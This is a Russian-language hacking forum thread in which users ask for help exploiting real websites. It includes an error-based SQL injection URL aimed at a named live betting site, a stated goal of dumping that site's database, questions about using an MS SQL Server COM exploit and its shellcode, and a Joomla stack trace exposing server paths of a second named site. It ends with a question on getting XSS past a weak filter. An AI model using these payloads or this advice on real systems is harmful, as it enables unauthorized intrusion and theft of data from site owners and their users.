Ваши вопросы по уязвимостям.

нету

 

Подскажите по вот этому эксплойту: https://www.exploit-db.com/exploits/38005/ (MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit) Просто раньше не работал с такими, asp'овскими. Как их эксплуатировать? Я видел, допустим, в примерах с php заливают эксплойт на сервер и просто переходят на него по ссылке для эксплуатации. Здесь вроде такой же подход? И какой именно шеллкод у этого сплоита? Просто, допустим, нужно открыть порт, а он вроде бы по другим командам...

И ещё, подскажите, кто знает, для каких версий SQL 2005 подходит данный сплоит. Там расписано больше, что под SQL Server 2000 SP4, а по 2005 мало что сказано (((

 

не тянет не хавидж не sqlmap вот такую вот скулю

Code:

http://www.sosbettingtips.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1

как раскрутить sqlmapom или еще чем нить это божетво.

 

Проверял один магазин и Acutenix сказал что есть тут sql inject

И какого типа эта уязвимость?
Вопрос а как дальше крутить? что подставлять?

 

Ставь Live http headers на мозилу и крути

 

руками все норм, нужно слить базу но незнаю как кроме sqlmap или хавидж

 

я через burp suite работаю, мне интересно что это за уязвимость и как ее дальше крутить? как обычную sql?
Получаю вот такой ответ.

 

поробуй через error baze вывести имена таблиц вот таким запросом

Code:

'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1

 

что некто не может раскрутить*?)

 

написать скрипт же

 

Да вот найти бы умельца(сам в этом еще не соображаю

 

jos-Warning: exception 'RuntimeException' with message 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM `j1_redirect_links` WHERE `old_url` = 'http://www.raa.ru/index.php?id=2011\'' LIMIT 0, 1' in /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver/mysqli.php:610 Stack trace: #0 /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() #1 /home/w/wermark/raa.ru/public_html/plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(JException)) #3 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(760): call_user_func(Array, Object(JException)) #4 [internal function]: JError::handleCallback(Object(JException), Array) #5 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(218): call_user_func_array(Array, Array) #6 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(179): JError::throwError(Object(JException)) #7 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(254): JError::raise(1, 404, '???????????????...', NULL, true) #8 /home/w/wermark/raa.ru/public_html/components/com_content/models/article.php(163): JError::raiseError(404, '???????????????...') #9 /home/w/wermark/raa.ru/public_html/libraries/legacy/view/legacy.php(401): ContentModelArticle->getItem() #10 /home/w/wermark/raa.ru/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #11 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(690): ContentViewArticle->display() #12 /home/w/wermark/raa.ru/public_html/components/com_content/controller.php(104): JControllerLegacy->display(true, Array) #13 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(728): ContentController->display() #14 /home/w/wermark/raa.ru/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #15 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(392): require_once('/home/w/wermark...') #16 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(372): JComponentHelper::executeComponent('/home/w/wermark...') #17 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #18 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #19 /home/w/wermark/raa.ru/public_html/libraries/cms/application/cms.php(252): JApplicationSite->doExecute() #20 /home/w/wermark/raa.ru/public_html/index.php(48): JApplicationCms->execute() #21 {main}

Что можно хорошего получить от этой ошибки?

 

раскрытие путей, не больше, скули тут нет

 

с чего вы взяли?

каким запросом она вызвана? когда в параметр id добавили обратный слэш?

 

так там что со слещем что без слеша нет разници, это просто ошибка DB поробуй крутануть любым способом,нечего не выйдет

 

Как я понял http://www.raa.ru/index.php?id=

 

Можно реализовать XSS? Фильтруется только "<". ?

Code:

<a href="http://yandex.ru">Text</a>

p\s gde text

 

не заметил ошибку, колонки header просто нет.